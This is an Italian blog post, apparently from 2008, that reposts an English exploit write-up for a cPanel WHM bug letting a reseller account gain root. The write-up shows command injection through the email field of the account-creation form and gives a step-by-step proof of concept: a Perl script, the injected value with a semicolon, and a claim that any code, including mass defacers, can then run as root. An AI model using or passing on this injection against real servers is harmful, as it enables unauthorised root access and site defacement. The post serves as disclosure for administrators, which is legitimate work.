cPanel Linux

cPanel bug: Accesso root tramite account reseller

E’ appena uscito un bug per il WHM di cPanel: tale bug permette ad un attaccante di avere accesso root tramite un semplice account rivenditore.

Ecco la descrizione (in inglese) dell’exploit:

By : Ali Jasbi ( IHST security & hacking Research team) WwW.Hackerz.ir
Vendor : Cpanel.net
Version : ALL !!
Risk : Very high
What u can do with this bug is :
u can have a access to all the server with reseller privilege (Th3 r00t)
how it’s work ?
when u want to create an account in shell what will happen ?
./script/wwwact [domainname] [username] [password] [Email address] lab lab lab
that u can run it with a web base program ! ( cpanel : doamin:2086)
example :
http://domain:2086/scripts/wwwacct [domainname] [username] [password] [Email address] lab lab lab
it means you got a access to wwwacct in the scripts folder (Th3 r00t)
so u can run other command with root access like that
./scripts/wwwactt domain.com domain password ali@hackerz.ir;./home/hackerz/public_html/do.pl ( your command now is ./home/hackerz/public_html/do.pl)
that u can Likewise run it on the web base program.what u need to do is just write ali@hackerz.ir;./home/hackerz/public_html/do.pl in Email text box when u want to create an account.
()()()()()()()()()()()()()
Test it:
++++++++++++++++++++++++++
Step 1

Save this file in /home/user/public_html/do.pl .
#!/usr/bin/perl
$old=’/home/user/public_html/test.txt’;
$new=’/home/root/kon.txt’;
rename $old, $new;
++++++++++++++++++++++++++
step 2

make a text file named test.txt in your public_html directory.
path will be : /home/user/public_html/test.txt .
++++++++++++++++++++++++++
step 3

create an account and write ali@hackerz.ir;./home/user/public_html/do.pl in E-mail Address text box
then click on the “create” button.
Yes , you can find your file in /home/root/ .
++++++++++++++++++++++++++
()()()()()()()()()()()()()
you can run your own code !(mass defacer, exploit’s or everything that u want).

Christian Cantinelli
Unix System Administrator, Network Admin, programmatore, webmaster. Solare, amante della musica, del cinema, dei viaggi. Questo il riassunto della mia persona.
You may also like
Risoluzione errore dell’ smtp di exim (cPanel) “T=remote_smtp defer (-53): retry time not reached for any host” e diminuire il problema della coda
TinyMCE: integrare perfettamente Ajax File Manager
RSS: nuovo aggregatore italiano bongolinux.com
1 Comment
  • 20 maggio 2008 at 15:27

    cPanel bug: Accesso root tramite account reseller | blog.morphey.org/blog…

    E’ appena uscito un bug per il WHM di cPanel: tale bug permette ad un attaccante di avere accesso root tramite un semplice account rivenditore…

Rispondi